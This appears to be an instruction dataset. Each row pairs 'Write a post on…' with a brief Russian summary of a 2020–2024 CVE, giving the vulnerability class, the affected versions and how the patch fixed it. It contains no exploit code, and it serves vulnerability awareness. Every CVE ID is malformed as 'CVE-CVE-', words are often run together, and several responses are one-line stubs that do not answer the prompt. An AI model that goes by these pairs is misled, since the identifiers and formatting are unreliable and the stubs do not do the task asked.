| Write a post on the following topic,"""повышение привилегий в Windows XAML diagnostics API""",CVE-CVE-2023-36003 (повышение привилегий в Windows XAML diagnostics API); |
| Write a post on the following topic,"""RCE vulnerability in Mirth Connect""",CVE-CVE-2023-43208 (RCE в Mirth Connect); |
| Write a post on the following topic,обход аутентификации в Fortra GoAnywhere,CVE-CVE-2024-0204 (обход аутентификации в Fortra GoAnywhere); |
| Write a post on the following topic,"""Path traversal vulnerability in PaperCut""",CVE-CVE-2023-39143 (проход пути в PaperCut). |
| Write a post on the following topic,Чтение произвольных файлов в Jenkins,CVE-CVE-2024-23897 (чтение произвольных файлов в Jenkins). |
| Write a post on the following topic,Прототипное загрязнение в утилитах hoolock до версии 2.2.1,"CVE-CVE-2024-23339 , обнаруженная в наборе утилитhoolock до версии 2.2.1, приводит кPrototype Pollution. Проблема заключалась в том, что ряд функций позволяли изменять поля объектов, включая свойства прототипов. Висправлениипри установке значения для поля была добавлена функцияsetSafeProperty, которая проверяет наличие собственного поля у объекта с использованием функцииhasOwnProperty, и предотвращает установку поля у прототипа." |
| Write a post on the following topic,CVE-CVE-2024-23345 XSS vulnerability in Nautobot,"CVE-CVE-2024-23345 , выявленная в платформеNautobot до версии 1.6.10 и 2.1.2,приводит кCross-site Scripting (XSS). Уязвимость обусловлена попаданием недоверенных пользовательских данных без предварительной санитизации в html-код при рендере Markdown. Висправленииhtml-код после рендера Markdown пропускается через санитизирующую функциюnautobot_logging.clean_html(html), в которой используется функцияnh3.clean, реализующая санинизацию данных на основе “белых” списков тегов и атрибутов." |
| Write a post on the following topic,Уязвимость SSRF в Whoogle Search до версии 0.8.3,"CVE-CVE-2024-22203 , найденная в поисковом движкеWhoogle Search до версии 0.8.3 (включительно), приводит кServer-Side Request Forgery (SSRF). В данном приложении существовала возможность попадания недоверенных пользовательских данных из состава параметров запроса (’url’, ‘type’) в состав URL формируемого GET-запроса. Дляисправленияразработчики реализовали проверку домена на его корректность (функцияvalidators.domain()) в составе URL перед формированием GET-запроса." |
| Write a post on the following topic,Уязвимость CVE-2024-23648 в Pimcore's Admin Classic Bundle,"CVE-CVE-2024-23648 , обнаруженная вPimcore's Admin Classic Bundle до версии 1.2.3, приводит к инъекции адреса атакующего, по которому производится отправка токена при сбросе пароля. Проблема заключалась в том, что для формирования адреса использовались данные из заголовка ‘Host’. Висправлениив процессе формирования адреса исключили использование данных из заголовка ‘Host’ и реализовали использование домена из состава конфигурационных данных." |
| Write a post on the following topic,Authentication Bypass в Fortra's GoAnywhere MFT до версии 7.4.1,"CVE-CVE-2024-0204 вFortra's GoAnywhere MFT до версии 7.4.1, упомянутая в наших еженедельных новостях, приводит кAuthentication Bypass. Проблема позволяла неавторизованному пользователю создать пользователя-администратора через административный портал. Описание бюллетеня безопасности можно найти вsecurity advisory. Детальный разбор уязвимости приведен в следующейстатье." |
| Write a post on the following topic,Path Traversal уязвимость в web-фреймворке aiohttp,"CVE-CVE-2024-23334 , обнаруженнаяв web-фреймворке aiohttp от 1.0.5 до версии 3.9.2, приводит кPath Traversal. В фреймворке существует проблема перебора каталога при резолве пути к статическим ресурсам с использованием параметраfollow_symlinks=True- нет контроля пути относительно корневой директории. Висправлениипри установленном флагеfollow_symlinks=Trueперед резолвом пути выполняется его нормализация (функцияos.path.normpath()) и проверка пути относительно корневого каталога (функцияpathlib.PurePath.relative_to())." |
| Write a post on the following topic,Command Injection уязвимость в Node.js,"CVE-CVE-2024-21488 , найденная впакете network для Node.js до версии 0.7.0, приводит кCommand Injection. Проблема обусловлена возможностью использования недоверенных данных от нарушителя в процессе формирования команды и ее выполнения с использованием функцииexec()пакетаchild_process. Дляисправленияразработчики добавили валидацию недоверенных входных данных с использованием функцииensure_valid_nic(), в которой реализовали проверку входных данных на “белый” список символов (a-zA-Z0-9_)." |
| Write a post on the following topic,Уязвимость Server-Side Request Forgery в клиенте TrueLayerNET для TrueLayer до версии 1.6.0,"CVE-CVE-2024-23838 , выявленная в клиентеTrueLayerNET для TrueLayer до версии 1.6.0, приводит кServer-Side Request Forgery. В приложении был реализован механизм формирования запросов поURI, значения которого могли формироваться из недоверенных пользовательских данных. Дляисправленияуязвимости разработчики добавили перед формированием запроса механизм контроляURI(функцияHasValidBaseUri()), в которойURIпроверяется на допустимые значения из конфигурации приложения." |
| Write a post on the following topic,Уязвимость XSS в клиенте apollo-client-nextjs для Next.js,"CVE-CVE-2024-23841 , найденная в клиентеapollo-client-nextjs для Next.js App Router до версии 0.7.0, приводит кCross-Site Scripting. Проблема заключается в функцииtransportDataToJS(), в которой производится преобразование входных данных из JSON-формата в строку. Возвращаемый результатtransportDataToJS()используется для формированияhtml-кода. Дляисключенияуязвимости разработчики добавили фильтрующую функциюhtmlEscapeJsonString(), в которой производится замена символов “&, <, >” на их Unicode ""\u0026, \u003e, \u003c""." |
| Write a post on the following topic,Path Traversal уязвимость в сервере Crafatar для Minecraft,"CVE-CVE-2024-24756 , обнаруженная в сервере ресурсовCrafatar для Minecraft до версии 2.1.5, приводит кPath Traversal. При обработке запроса доступа к публичному ресурсу (каталогlib/public) значение пути из запроса записывается в полеreq.url.path_list, которое в дальнейшем используется для чтения файла в функцииasset_request(). При исправлении проблемы для формирования пути стали использовать функциюpath.resolve(), которая сформирует абсолютный путь без символов “../”, а также в функциюasset_request()добавили дополнительную проверку выхода за пределы каталогаlib/publicпри доступе к публичному ресурсу." |
| Write a post on the following topic,"""Type Confusion in V8/Google Chrome""",CVE-CVE-2022-4262 (Type Confusion в V8/Google Chrome); |
| Write a post on the following topic,"""неограниченная загрузка файлов в Avalanche""",CVE-CVE-2023-46263 (неограниченная загрузка файлов в Avalanche); |
| Write a post on the following topic,"""RCE vulnerability in Shim loading mechanism""",CVE-CVE-2023-40547 (RCE в механизме загрузки Shim); |
| Write a post on the following topic,"Уязвимости, связанные с повреждением памяти в HTTP серверах Lotos, Pico и Cherry","CVE-CVE-2024-22086 , CVE-2024-22087, и CVE-2024-22088(повреждения памяти в Lotos HTTP Server, Pico HTTP Server и Cherry HTTP Server);" |
| Write a post on the following topic,Переполнение кучи в glibc,CVE-CVE-2023-6246 (переполнение кучи в glibc); |
| Write a post on the following topic,"Уязвимости в Ofbiz: небезопасная десериализация, обход аутентификации и RCE","CVE-CVE-2023-49070 , CVE-2020-9496 и CVE-2023-51467(небезопасная десериализация, обход аутентификации и RCE в Ofbiz);" |
| Write a post on the following topic,"""Code injection vulnerability in Zyxel NAS326 and NAS542""",CVE-CVE-2023-5372 (code injection в Zyxel’s NAS326 и NAS542). |
| Write a post on the following topic,SQL Injection Vulnerability in SQLAlchemy Database Adapter,"CVE-CVE-2024-24811 , обнаруженная вадаптере базы данных SQLAlchemyDA до версии 2.2, приводит кSQL Injection. Проблема появилась из-за возможности использования методов формирования query-запросов без ограничений приватности. Висправлениибыли добавлены соответствующие настройки приватности для критичных методов с использованием методов (protected(), private()) из классаClassSecurityInfo." |
| Write a post on the following topic,ReDoS уязвимость в FastAPI до версии 0.109.1 из-за модуля python-multipart.,"CVE-CVE-2024-24762 , выявленнаяв веб фреймворке FastAPI до версии 0.109.1, которая приводила кReDoS. Нарушитель мог скорректировать заголовокContent-Type, таким образом, что в процессе его контроля по регулярному выражению происходит повышенное потребление вычислительных ресурсов, что приводит к задержке обработки следующих запросов. Проблема была обусловлена использованием уязвимого модуляpython-multipart (ver. 0.0.5), висправлениибыла скорректирована версия на0.0.7." |
| Write a post on the following topic,Cross-site Scripting vulnerability in phpMyFAQ before version 3.2.5,"CVE-CVE-2024-24574 , найденнаяв приложении phpMyFAQ до версии 3.2.5, приводит кCross-site Scripting. В приложении существует возможность загрузки файла, а потом использование данных файла (filename, record_lang, mime_type) для отображения на клиентской стороне. Дляисправленияуязвимости разработчики для полей:filename, record_lang, mime_typeпри их отображении добавили экранирующую функциюStrings::htmlentities()." |
| Write a post on the following topic,SQL Injection в плагине Podlove Subscribe для WordPress,"CVE-CVE-2024-1118 , обнаруженнаяв плагине Podlove Subscribe для WordPress до версии 1.3.10, приводит кSQL Injection. Проблема заключалась в использовании недоверенных данных в формировании query-запроса к БД. Висправленииразработчики стали использовать функцию параметризации query-запросаprepare()классаwpdb." |
| Write a post on the following topic,"Уязвимость в JetBrains TeamCity, приводящая к обходу аутентификации и возможному удаленному выполнению кода","CVE-CVE-2024-23917 , выявленная в JetBrains TeamCityдо версии 2023.11.3, приводит кBypass Authentication.Наиболее критичным последствием данной уязвимости может являтьсяRCE. О деталях уязвимости можно почитать на блоге поссылке." |
| Write a post on the following topic,"""Уязвимость некорректной авторизации в Pixelfed до версии 0.11.11""","CVE-CVE-2024-25108 , обнаруженнаяв платформе Pixelfed до версии 0.11.11, приводит кIncorrect Authorization. Проблема появилась из-за возможности получения административного доступа. Висправленииввели дополнительные поля вpassport: admin:read, admin:write, которые стали контролироваться вAdminApiController. Также добавили проверку токена при обработке запроса$request->user()->token()." |
| Write a post on the following topic,Уязвимость CVE-2024-24814 в mod_auth_openidc приводит к DoS.,"CVE-CVE-2024-24814 , найденнаяв модуле mod_auth_openidc для Apache до версии2.4.15.2, приводит кUncontrolled Resource Consumption (DoS). Нарушитель при установке достаточно большого значения (99999999)mod_auth_openidc_sessionвcookie, приводит к потреблению избыточных ресурсов сервера. Висправленииразработчики ввели ограничение на максимальное количествоchunkCount, не более 99." |
| Write a post on the following topic,Cross-site scripting vulnerability in SidekiqUniqueJobs gem,"CVE-CVE-2024-25122 , обнаруженнаяв gem модуле SidekiqUniqueJobs до версии 7.1.33 и 8.0.7, приводит кCross-site Scripting. В модуле дляEndpoint""/changelogs, /locks, /expiring_locks"" недоверенные пользовательские данные участвуют в формировании html-страниц. Длякорректировкиразработчики значения параметров из запроса (filter, count, cursor, prev_cursor, digest) пропускают через экранирующую функциюh(), которая является псевдонимом функцииhtml_escape()." |
| Write a post on the following topic,Path Traversal уязвимость в веб-приложении Mission Support System,"CVE-CVE-2024-25123 , выявленнаяв веб-приложении Mission Support System до версии 8.3.3, приводит кPath Traversal.В приложении внешние данные (переменнаяfilename) участвуют в формировании пути к статическому файлу с использованием функцииos.path.join(). Впатчезначение переменнойfilenameстали пропускать черезwerkzeug.security.safe_join()для исключения выхода за пределы базовой директории." |
| Write a post on the following topic,Уязвимость Remote Code Execution в теме Bricks для WordPress,"CVE-CVE-2024-25600 , выявленная в темеBricks theme для WordPressдо версии 1.9.6 включительно, приводит кRemote Code Execution. Уязвимость обусловлена использованием функцииeval()при вызовеprepare_query_vars_from_settings(), которая может быть вызвана пользователем без аутентификации. Описание внесенных изменений можно найти поссылке. Детальный разбор уязвимости приведен встатьеи разборепатча." |
| Write a post on the following topic,Kerberos relay and session hijacking in VMware Enhanced Authentication plugin.,"CVE-CVE-2024-22245 , CVE-2024-22250(Kerberos relay и похищении сессии в VMware Enhanced Authentication plugin);" |
| Write a post on the following topic,"""Injection of code in Vanti EPM Cloud Services Appliance""",CVE-CVE-2021-44529 (инъекция кода в vanti EPM Cloud Services Appliance); |
| Write a post on the following topic,"""RCE vulnerability in MyQ Print Server""",CVE-CVE-2024-22076 (RCE в MyQ Print Server); |
| Write a post on the following topic,утечка содержимого памяти в Qualcomm Adreno GPU,CVE-CVE-2022-25664 (утечка содержимого памяти в Qualcomm Adreno GPU); |
| Write a post on the following topic,"""Stored XSS vulnerability in Ghost CMS leading to CMS instance takeover""","CVE-CVE-2024-23724 (хранимая XSS в Ghost CMS, развиваемая в захват инстанса CMS)." |
| Write a post on the following topic,Обнаружение Buffer Overflow в библиотеке CBOR,"CVE-CVE-2024-26134 , обнаруженнаяв библиотеке CBOR до версии 5.6.2, приводит кBuffer Overflow. Проблема заключалась в возможности выхода за пределы буфера в процессе чтении данных из потока. Висправлениипри чтении данных (функцииdecode_bytestring(),decode_string()) реализовано ограничение на максимальную длину (65536) порции данных." |
| Write a post on the following topic,Cross-site scripting vulnerability in Decidim framework versions up to 0.27.5 and 0.28.0,"CVE-CVE-2023-51447 , найденнаяв фреймворке Decidim до версии 0.27.5 и 0.28.0, приводит кCross-site Scripting. В приложении при формированииhtml-страницыбыла возможность использовать данные (filename) загружаемого пользовательского файла. Дляисправленияразработчик стали использовать экранирующие функцииdecidim_html_escape(), escapeHtml(), escapeQuotes()." |
| Write a post on the following topic,Уязвимость Cross-site Websocket Hijacking в MeshCentral,"CVE-CVE-2024-26135 , выявленнаяв сайте MeshCentralдо версии 1.1.21, приводит кСross-site Websocket Hijacking (CSWSH). Уязвимость обнаружена в административном компоненте и позволяла на клиентской стороне атакующему создать межсайтовое соединение черезwebsocketи читать конфигурационный файл сервера или генерировать токены доступа. Висправлениибыла введена проверка заголовкаOriginна ""белый"" список доменов (allowedorigin) с использованием функцииCheckWebServerOriginName()." |
| Write a post on the following topic,Обнаружение уязвимости Cross-site Scripting в Querybook,"CVE-CVE-2024-26148 , обнаруженнаяв Querybook до версии 3.31.1, приводит кCross-site Scripting. Проблема заключалась в возможности внедрения инъекции (javascript:) черезURL. Висправлениибыла добавлена проверкаsanitizedUrl, которая протокол в составеURLна разрешенные значения(http, https)." |
| Write a post on the following topic,"""Insecure CORS vulnerability in Fiber framework""","CVE-CVE-2024-25124 , найденнаяв web фреймворке Fiber до версии 2.52.1, приводит кInsecure CORS. Приложение допускает небезопасные конфигурации, которые потенциально могут подвергнуть приложение множеству уязвимостей, связанных сCORS. Дляисправленияразработчик добавили функциюvalidateDomain(), которая проверяетoriginна соответствие разрешенному домену." |
| Write a post on the following topic,SQL Injection vulnerability in Parse Server versions up to 6.5.0,"CVE-CVE-2024-27298 , обнаруженнаяв Parse Server в версиях до 6.5.0, приводит кSQL Injection. Проблема заключалась в возможности обхода регулярного выражения (/([^'])'/), использующегося для фильтрации входных данных. Висправлениибыл скорректирован паттерн, который используется для фильтрации входных данных, путем добавления глобального модификатора -/([^'])'/g." |
| Write a post on the following topic,XSS уязвимость в Pineterest Querybook,"CVE-CVE-2024-27103 , обнаруженнаяв Pineterest Querybook в версии до 3.31.1, приводит к возможности реализацииXSS. Проблема заключалась в использовании небезопасного поляdangerouslySetInnerHTML, в которое попадает пользовательский ввод. Висправлениибыла добавлена санитизация данных, которые вводит пользователь, с помощью функцииDOMPurify.sanitize." |
| Write a post on the following topic,Уязвимость Prototype Pollution в JSONata до версии 1.8.7,"CVE-CVE-2024-27307 , выявленнаяв JSONata до версии 1.8.7, приводит кPrototype Pollution. Уязвимость обусловлена возможностью внедрения выражения с операторомtransformдля переопределения конструктора и прототипа объекта в приложения. Висправлениибыла добавлена проверка наличия в получаемой строке обращений к прототипу объекта или конструктору, при появлении которых возвращается ошибка." |
| Write a post on the following topic,Уязвимость XSS в Ruby on Rails,"CVE-CVE-2024-26143 , выявленнаяв Ruby on Rails в версии до7.0.8.1, приводит к возможности реализацииXSS. Уязвимость обусловлена возможностью использования помощников перевода для обработки данных, содержащих полезную нагрузку XSS. Висправленнойверсии был добавлен фрагмент кода, который преобразует входные данные в массив и санитизирует каждый элемент массива с помощьюERB::Util.html_escape." |
| Write a post on the following topic,Уязвимость обхода политики CORS в фреймворке go-zero,"CVE-CVE-2024-27302 , выявленнаяв фреймворке go-zero до версии 1.4.4, приводит к возможностиобхода политики CORS. Уязвимость обусловлена возможностью злоумышленника обходить политику CORS путем внедрения в заголовок http-запросаOriginзначения домена, содержащего в себе домен цели. Например для целиsafe.comможно внедрить доменnot-safe.comи обойти фильтр политики. Висправлениив функцииisOriginAllowed()была добавлена проверка значенияОriginна соответствие ""белому"" списку разрешенных доменов." |
| Write a post on the following topic,"""Server Side Template Injection (SSTI) в peering-manager""","CVE-CVE-2024-28114 , обнаруженная в инструментеpeering-manager в версиях до версии 1.8.3, приводит кServer Side Template Injection (SSTI). Проблема заключалась в возможности внедрять вредоносный код в процессе рендераjinja-шаблона. Висправлениибыли внесены изменения в функциюrender_jinja2(), путем использования функцииSandboxedEnvironment()для создании ""песочницы"" при рендере шаблона." |
| Write a post on the following topic,Уязвимость OS Command Injection в SOY CMS,"CVE-CVE-2024-28187 , выявленная вSOY CMS в версиях до 3.14.2, приводит кOS Command Injection. Уязвимость обусловлена возможностью выполнять произвольные команды ОС через специально созданные имена файлов при их загрузке. Висправлениибыла добавлена экранирующая функцияescapeshellarg()при обработке имени файла для функцииexecute()классаUploadFileAction." |
| Write a post on the following topic,Уязвимость XSS в фреймворке Phlex,"CVE-CVE-2024-28199 , выявленнаяв фреймворке Phlex в версияхдо 1.9.1, приводит кXSS. Уязвимость обусловлена возможностью внедренияjavascript:в составе ссылки, предоставляемой пользователем (например, атрибутhrefтега<a>). Висправлениив функции__build_attributes__был реализован фильтр, исключающий наличие в атрибутеhrefзначения ""javascript:""." |
| Write a post on the following topic,Insecure deserialization in Symfony1 PHP web framework,"CVE-CVE-2024-28861 , обнаруженная вSymfony1 PHP web framework в версии до 1.5.18, приводит кInsecure deserialization. Проблема заключалась в возможности десериализации пользовательского кода в методе_unserialize()классовsfNamespacedParameterHolder, sfParameterHolder. Висправлениибыли внесены изменения в метод_unserialize()путем внедрения проверки типа (array) передаваемых данных и ограничения на максимальное количество элементов." |
| Write a post on the following topic,Уязвимость в библиотеке follow-redirects приводит к утечке информации,"CVE-CVE-2024-28849 , найденная вбиблиотеке follow-redirects в версиях до 1.15.5, приводит кInformation Disclosure. Уязвимость обусловлена возможностью перехвата учетных данных при кросс-доменном перенаправлении через прокси. Дляисправлениябыла скорректирована функцияRedirectableRequest.prototype._processResponse()в части расширения регулярного выражения ""(?:proxy-)?"", используемого для удаления заголовкаProxy-Authorization." |
| Write a post on the following topic,Vulnerability in PyAnsys Geometry leading to OS Command Injection.,"CVE-CVE-2024-29189 , обнаруженная вPyAnsys Geometry в версиях до 0.3.3, приводит кOS Command Injection. Проблема заключалась в потенциальной возможности прямого вызова метода_start_program()с установленным флагомshell=True. Висправленииизменили имя функции на приватное__start_program()и убрали механизм установки флагаshell=True." |
| Write a post on the following topic,Уязвимость XSS в GeoNode до версии 4.2.3,"CVE-CVE-2024-27091 , выявленная вGeoNode до версии 4.2.3, приводит кCross-Site Scripting (XSS). Уязвимость обусловлена воpможностью внедрения в состав отображаемогоhtml-кодазначений из ранее полученных данных нарушителя. Впатчебыл добавлен методsanitize_html(), который экранирует опасныетеги htmlс помощью библиотекиnh3." |
| Write a post on the following topic,CVE-2024-28233: CSRF в JupyterHub до версии 4.1.0,"CVE-CVE-2024-28233 , обнаруженная вJupyterHub до версии 4.1.0, приводит кCross-Site Request Forgery (CSRF). Проблема заключалась в возможности реализации атаки, заставив пользователя посетить вредоносный поддомен, и получить полный доступ кAPI JupyterHubи серверу пользователя. Висправлениибыла добавлены дополнительные настройки безопасности с использованием XSRF-токенов." |
| Write a post on the following topic,XSS vulnerability in video server SRS versions up to 5.0.210,"CVE-CVE-2024-29882 , обнаруженнаяв video server SRS в версиях до 5.0.210, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности внедрения в эндпоинт/api/v1/vhosts/vid-<id>?callback=<payload>вредоносных данныхjavascript. Дляисправлениябыла добавлена валидация и проверка получаемого значенияcallbackна отсутствие недопустимых символов." |
| Write a post on the following topic,Уязвимость SQL-инъекции в PHPMyFAQ версии 3.2.5,"CVE-CVE-2024-27299 , выявленная вPHPMyFAQ в версии 3.2.5, приводит кSQL-injection. Уязвимость обусловлена возможностью внедрения вредоносного SQL кода в полеauthorEmailпри добавлении новости. Висправлениибыло добавлено экранирование поляauthorEmailс помощью функцииescape()." |
| Write a post on the following topic,Безопасность веб-приложений: уязвимость CVE-2024-31218 в Webhood,"CVE-CVE-2024-31218 , обнаруженная вWebhood до версии 0.9.1, приводит кBroken Access Control. Проблема заключалась в возможности неавторизированному злоумышленнику отправитьHTTP-запроскAPIадминистраторабазы данных (Pocketbase) для создания учетной записи администратора . Висправлениибыла добавлена функция генерации случайной учетной записи администратора, если учетные записи администратора еще не были созданы." |
| Write a post on the following topic,Уязвимость Local File Inclusion в Voila до версии 0.2.17,"CVE-CVE-2024-30265 , выявленная вvoila в версиях до 0.2.17, приводит кLocal File Inclusion. Уязвимость обусловлена возможностью доступа неавторизированных пользователей к локальным файлам хоста. Висправлениииз функции инициализации приложенияtornado.web.Application()был удален параметрstatic_path=""/"", указывающий на корневую директорию файловой системы, ." |
| Write a post on the following topic,XSS уязвимость в Typebot версии 2.23.0,"CVE-CVE-2024-30264 , найденная вTypebot версии 2.23.0, приводит кXSS. Проблема обусловлена возможностью злоумышленника выполнить произвольный JavaScript путем отправки пользователю ссылки на страницу авторизации. Дляисправлениябыла добавлена санитизация параметраredirectPathс помощью функцииsanitizeUrl()из состава библиотеки@braintree/sanitize-url." |
| Write a post on the following topic,Уязвимость SSRF в Mobile Security Framework до версии 3.9.7,"CVE-CVE-2024-31215 , выявленная вMobile Security Framework до версии 3.9.7, приводит кSSRF. Уязвимость обусловлена возможностью злоумышленника заставить сервер подключиться к внутренним службам в инфраструктуре организации. Висправлениив функцияхopen_firebase(), firebase_analysis()была добавлена проверка передаваемого адреса на содержание в нем подстрокиfirebaseio.com." |
| Write a post on the following topic,Уязвимость Remote Code Execution в pgAdmin4,"CVE-CVE-2024-3116 , выявленная вpgAdmin4 до версии 8.5, приводит кRemote Code Execution (RCE). Уязвимость позволяет злоумышленникам выполнять произвольный код на сервереPGAdminчерез API валидации бинарного пути . Висправленииулучшена проверка отклонений бинарного пути. Детальный разбор уязвимости приведен встатье, а Proof-of-Concept поссылке." |
| Write a post on the following topic,OS Command Injection в yt-dlp,"CVE-CVE-2024-22423 , обнаруженная вyt-dlp в версиях до 2024.04.09, приводит кOS Command Injection. Проблема заключалась в возможности удаленного выполнения кода через внедрение специальных символов. Висправлениибыла добавлена функцияshell_quote(), с помощью которой происходит экранирование внедряемых специальных символов." |
| Write a post on the following topic,"Уязвимость в Rust, приводящая к удалённому выполнению кода (Remote Code Execution)","CVE-CVE-2024-24576 , выявленная вRust в версиях до 1.77.2, приводит кRemote Code Execution. Уязвимость обусловлена возможностью злоумышленника выполнять произвольные команды оболочки в ОС Window используяAPI Command, минуя экранирование аргументов, передаваемых в порожденный процесс. Висправлениибыла добавлена функцияappend_bat_arg()для обработки и экранирования получаемых аргументов." |
| Write a post on the following topic,Server-side Request Forgery в Plane до v0.17-dev,"CVE-CVE-2024-31461 , обнаруженная вPlaneв версиях до v0.17-dev, приводит кServer-side Request Forgery. Проблема заключалась в возможности злоумышленника отправлять произвольные запросы с сервера, на котором размещено приложение, что потенциально может привести к несанкционированному доступу к внутренним системам. Висправлениибыла добавлена функцияis_allowed_hostnameдля проверки получаемого доменного имени с ""белым"" списком разрешенных значений." |
| Write a post on the following topic,Уязвимость в llama-index приводит к удаленному выполнению кода,"CVE-CVE-2024-3098 , выявленная вllama-index в версиях до 0.10.24, приводит кRemote Code Execution. Уязвимость обусловлена возможностью злоумышленника добиться удаленного выполнения кода посредством манипуляций с подклассомstr. Висправлениибыл изменен списокALLOWED_BUILTINS, который содержит в себе разрешенные встроенные объекты, а также добавлен контроль обращения к объектам, которые не входят в него." |
| Write a post on the following topic,OS Command Injection в файрволлах Palo Alto,"CVE-CVE-2024-3400 , обнаруженная в файрволлахPalo Alto в версиях PAN-OS 10.2, 11.0 и 11.1, приводит кOS Command Injection. Проблема заключалась в возможности злоумышленника, не прошедшему аутентификацию, выполнить произвольный код с привилегиями root на брандмауэре. Описание проблемы приведено в официальномsecurity advisory. Встатьеот специалистовUnit42содержится информация об уязвимостиCVE-2024-3400и данные об успешных атаках." |
| Write a post on the following topic,Обнаружение уязвимости Local File Inclusion в langchain (CVE-2024-3571),"CVE-CVE-2024-3571 , обнаруженная вlangchain в версиях до 0.0.353, приводит кLocal File Inclusion (LFI). Проблема заключается в возможности злоумышленника обращаться к файлам ОС напрямую с правами чтения и записи. Висправлениибыл изменен метод_get_full_path()путем добавления проверки получаемого значения пути со значением корневого каталога (self.root_path)." |
| Write a post on the following topic,CVE-2024-27306: XSS vulnerability in aiohttp due to improper file name handling,"CVE-CVE-2024-27306 , обнаруженная вaiohttp в версиях до 3.9.4, приводит кCross-SiteScripting (XSS). Проблема заключалась в возможности злоумышленника загружать файлы с произвольными именами в статический каталог. Далее имена файлов использовались при генерации html-кода index страницы. Висправлениибыла скорректирована функция_directory_as_html()путем экранирования специальных символов в именах файлов с помощью методовhtml_escapeи_quote_path." |
| Write a post on the following topic,Insecure Deserialization in BentoML,"CVE-CVE-2024-2912 , обнаруженная вBentoML в версиях до 1.2.5, приводит кInsecure Deserialization. Проблема заключается в возможности удаленного выполнения кода с помощью специально сформированного POST-запроса cо значением""Content-Type"": ""application/vnd.bentoml+pickle""на любую допустимую конечную точку. Висправлениибыла добавлена проверка на тип""application/vnd.bentoml+pickle""и формирование исключения при положительном результате." |
| Write a post on the following topic,CVE-CVE-2024-32472 в excalidraw приводит к Cross-Site Scripting (XSS),"CVE-CVE-2024-32472 , обнаруженная вexcalidraw в версиях до 0.17.6, приводит кCross-Site Scripting (XSS). Проблема заключалась в возможности злоумышленника запускать произвольныйJavaScriptв контексте домена, на котором размещен редактор. Одной из причин проблемы является рендер недоверенных данных для фреймаsrcdoc. Висправлениибыла добавлена функция экранированияsanitizeHTMLAttribute(), которая используется при формировании ссылки для фреймаsrcdoc- функцияcreateSrcDoc()." |
| Write a post on the following topic,CVE-2024-20356: Command Injection Vulnerability in Cisco Integrated Management Controller,"CVE-CVE-2024-20356 , обнаруженная вCisco Integrated Management Controller, приводит кCommand Injection.Проблема заключалась в возможности злоумышленника, прошедшего проверку подлинности, с привилегиями уровня администратора выполнить атаки путем внедрения команд в уязвимую систему и повысить свои привилегии до уровня root. Описание проблемы приведено в официальномsecurity advisory. Встатьеот специалистовNettitudeсодержится информация об уязвимостиCVE-2024-20356и данные об успешных атаках." |
| Write a post on the following topic,Deserialization of Untrusted Data in NewPipe Android App,"CVE-CVE-2024-32876 , обнаруженная в Android приложенииNewPipe в версиях до 0.27.0, приводит кDeserialization of Untrusted Data. Проблема заключалась в возможности удаленного выполнения кода на устройствах с помощью резервной копии, содержащейpayload. Висправлениибыло добавлено ограничение классов, которые могут быть десериализованы при обработке потоковых объектовJava, добавив ""белый"" список с классами (CLASS_WHITELIST), которые не могут привести к выполнению произвольного кода." |
| Write a post on the following topic,Уязвимость Prototype Pollution в пакете@conform-to,"CVE-CVE-2024-32866 , выявленная в пакете@conform-to/... в версиях до 1.1.1, приводит кPrototype Pollution. Уязвимость обусловлена возможностью злоумышленника инициировать ""загрязнения"" прототипа, передав ""загрязненные"" данные в функцииparseWith...(). Висправлениибыла добавлена проверка наличия поля у объекта (черезObject.hasOwn()) в функцияхsetValue()иgetValue()." |
| Write a post on the following topic,SQL Injection в LibreNMS,"CVE-CVE-2024-32461 , обнаруженная в системе мониторингаLibreNMS в версии 24.3.0, приводит кSQL Injection. Проблема заключалась в возможности пользователя с глобальными привилегиями выполнить SQL-запрос черезpackageпараметр. Висправлениибыло скорректировано формирований SQL-запроса с использованием параметризации." |
| Write a post on the following topic,Уязвимость SSTI в сервисе changedetection,"CVE-CVE-2024-32651 ,обнаруженная в сервисеchangedetection версии до 0.45.21, приводит кServer-Side Template Injection (SSTI). Причиной уязвимости является возможность влияния нарушителя на шаблон перед его рендером, что позволяет выполнять навязанный нарушителем код. Висправлениистали выполнять рендер шаблона в ""песочнице"" через использование классаjinja2.sandbox.ImmutableSandboxedEnvironment. вместо небезопасного классаjinja2.Environment." |
| Write a post on the following topic,"Уязвимость CVE-2024-4040 в CrushFTP, приводящая к удалённому выполнению кода.","CVE-CVE-2024-4040 , обнаруженная вCrushFTP в версиях до 10.7.1 и 11.1.0, приводит кRemote Code Execution (RCE). Проблема заключалась в возможности неаутентифицированным удаленным злоумышленникам читать файлы из файловой системы за пределами песочницы VFS, обходить аутентификацию для получения административного доступа и выполнять удаленное выполнение кода на сервере. Описание проблемы, а также рекомендации по обновлению в официальномsecurity advisory. Встатьеот специалистовRapid7содержится информация об уязвимостиCVE-2024-4040и данные об успешных атаках." |
| Write a post on the following topic,Vulnerability in xml-crypto leading to improper verification of cryptographic signature.,"CVE-CVE-2024-32962 , обнаруженная вxml-crypto в версиях с 4.0.0 до 6.0.0, приводит кImproper Verification of Cryptographic Signature. Проблема заключалась в отсутствии проверок для сертификата, которым подписанXML-документ, и использовании по умолчанию сертификата из элемента<KeyInfo/>. Злоумышленник может подписатьXML-документподписью, созданной с использованием своего закрытого ключа и прикрепить сертификат к элементу<KeyInfo/>, что позволит ему успешно пройти проверку подлинности. Висправлениибыло отключено использование по умолчанию функцииgetCertFromKeyInfo(), которая извлекает сертификат из элемента<KeyInfo/>." |
| Write a post on the following topic,Vulnerability in aiohttp leading to Denial of Service (CVE-CVE-2024-30251).,"CVE-CVE-2024-30251 , выявленная в фреймворкеaiohttp в версиях до 3.9.4, приводит кDenial of Service (DoS). Уязвимость обусловлена возможностью атакующего отправить специально созданный запросPOST(multipart/form-data) и когда серверaiohttpобработает его, сервер войдет в бесконечный цикл и не сможет обрабатывать дальнейшие запросы. Висправлениибыла добавлена проверка достижения конца данных (функцияat_eof()) и формирование признака завершения обработки данныхself._at_eof = True." |
| Write a post on the following topic,OS Command Injection in sagemaker-python-sdk,"CVE-CVE-2024-34073 , обнаруженная вsagemaker-python-sdk в версиях до 2.214.3, приводит кOS Command injection. Проблема заключалась в возможности удаленного выполнение кода путем его внедрения в параметрrequirements_path. Висправлениибыла изменена функцияcapture_dependencies(),в которой команда стала формироваться с использованием списка, а для ее исполнения стали использовать командуsubprocess.run()с флагамиcheck=Trueиcapture_output=True." |
